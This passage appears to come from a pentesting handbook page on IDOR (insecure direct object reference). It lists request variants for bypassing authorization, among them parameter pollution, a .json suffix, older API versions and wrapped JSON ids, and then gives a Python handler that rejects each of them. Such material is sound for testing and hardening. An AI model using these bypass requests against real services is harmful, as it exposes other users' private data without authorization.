Pentest Book
IDOR
Basics
Check for valuable words:

{regex + perm} id
{regex + perm} user
{regex + perm} account
{regex + perm} number
{regex + perm} order
{regex + perm} no
{regex + perm} doc
{regex + perm} key
{regex + perm} email
{regex + perm} group
{regex + perm} profile
{regex + perm} edit
Bypasses
Add parameters onto the endpoints. For example, if there was:

GET /api_v1/messages --> 401

vs

GET /api_v1/messages?user_id=victim_uuid --> 200
HTTP Parameter pollution
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK

GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
Add .json to the endpoint, if it is built in Ruby!
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
Test on outdated API versions:

/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
Wrap the ID with an array:

{"id":111} --> 401 Unauthorized
{"id":[111]} --> 200 OK
Wrap the ID with a JSON object:
{"id":111} --> 401 Unauthorized

{"id":{"id":111}} --> 200 OK
JSON Parameter Pollution:
POST /api/get_profile
Content-Type: application/json

{"user_id":<legit_id>,"user_id":<victim's_id>}
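Every bypass above works because the server authorizes one shape of the request and then serves another. As an added example from the defensive side (this is not code from the pentest-book), here is a minimal Python request handler that collapses all of the variants listed on this page, extra parameters, duplicated parameters, the `[]` array form, `.json` suffixes, old version prefixes, array- or object-wrapped ids and duplicate JSON keys, into one canonical object id and performs exactly one ownership check on it. The route prefixes, resource names and the `OWNERS` table are constructed assumptions; `handle_request` returns the HTTP status the server would send.

```python
import json
import re
from urllib.parse import parse_qsl

# Constructed data: a tiny "database" mapping object ids to their owners.
OWNERS = {1234: "alice", 2341: "bob", 111: "carol"}


class Forbidden(Exception):
    """Raised when the request must be denied (HTTP 403)."""


_ID_RE = re.compile(r"^[0-9]{1,18}$")
# Version prefix and format suffix are parsed away so they can never select a
# different code path: /v1/..., /v3/..., /api/... and ".json" all land here.
_PATH_RE = re.compile(
    r"^/(?:api/|api_v1/|v[0-9]+/)?"
    r"(?P<resource>messages|user_data|users_data|get_profile)"
    r"(?:/(?P<id>[^/.]+))?(?:\.json)?$"
)


def canonical_id(value):
    """Accept only a scalar numeric id.

    Arrays and nested objects ({"id":[111]}, {"id":{"id":111}}) are rejected
    outright instead of being unwrapped to the first element.
    """
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise Forbidden("id must be a scalar")
    text = str(value)
    if not _ID_RE.match(text):
        raise Forbidden("malformed id")
    return int(text)


def single_query_param(query, name):
    """Fetch one query parameter; the array form is never accepted for a
    scalar id and a duplicated name (user_id=a&user_id=b) is tampering."""
    hits = []
    for key, val in parse_qsl(query, keep_blank_values=True):
        if key == name + "[]":
            raise Forbidden("array form not accepted")
        if key == name:
            hits.append(val)
    if len(hits) > 1:
        raise Forbidden("parameter pollution")
    return hits[0] if hits else None


def json_no_duplicate_keys(body):
    """json.loads silently keeps the last duplicate key; object_pairs_hook lets
    us reject a polluted body such as {"user_id":A,"user_id":B} instead."""
    def check(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise Forbidden("duplicate JSON key")
            seen.add(key)
        return dict(pairs)
    return json.loads(body, object_pairs_hook=check)


def handle_request(path, query, body, session_user):
    """Return 200, 403 or 404.

    The target id may arrive in the path, the query string or the JSON body,
    but it must be supplied at most once, and the single ownership check runs
    after every path/format/version variant has been normalised away.
    """
    match = _PATH_RE.match(path)
    if not match:
        return 404
    try:
        candidates = []
        if match.group("id") is not None:
            candidates.append(match.group("id"))
        from_query = single_query_param(query or "", "user_id")
        if from_query is not None:
            candidates.append(from_query)
        if body:
            data = json_no_duplicate_keys(body)
            for key in ("user_id", "id"):
                if key in data:
                    candidates.append(data[key])
        if not candidates:
            # No explicit target: the caller acts on their own objects only.
            return 200
        if len(candidates) > 1:
            raise Forbidden("id supplied more than once")
        oid = canonical_id(candidates[0])
        # Unknown ids and other users' ids get the same answer, so the status
        # code does not reveal which ids exist.
        if OWNERS.get(oid) != session_user:
            raise Forbidden("not the owner")
        return 200
    except Forbidden:
        return 403


if __name__ == "__main__":
    print(handle_request("/api_v1/messages", "user_id=2341", None, "alice"))
    print(handle_request("/user_data/2341.json", "", None, "alice"))
    print(handle_request("/api/get_profile", "", '{"id":[111]}', "carol"))
```

The design choice worth copying is that the handler never does "first value wins" or "unwrap and continue": any ambiguity about which object is being requested is itself a denial. Rejecting with a uniform 403 for duplicated, array-wrapped or object-wrapped ids also gives the web application firewall and the logs a single event to alert on.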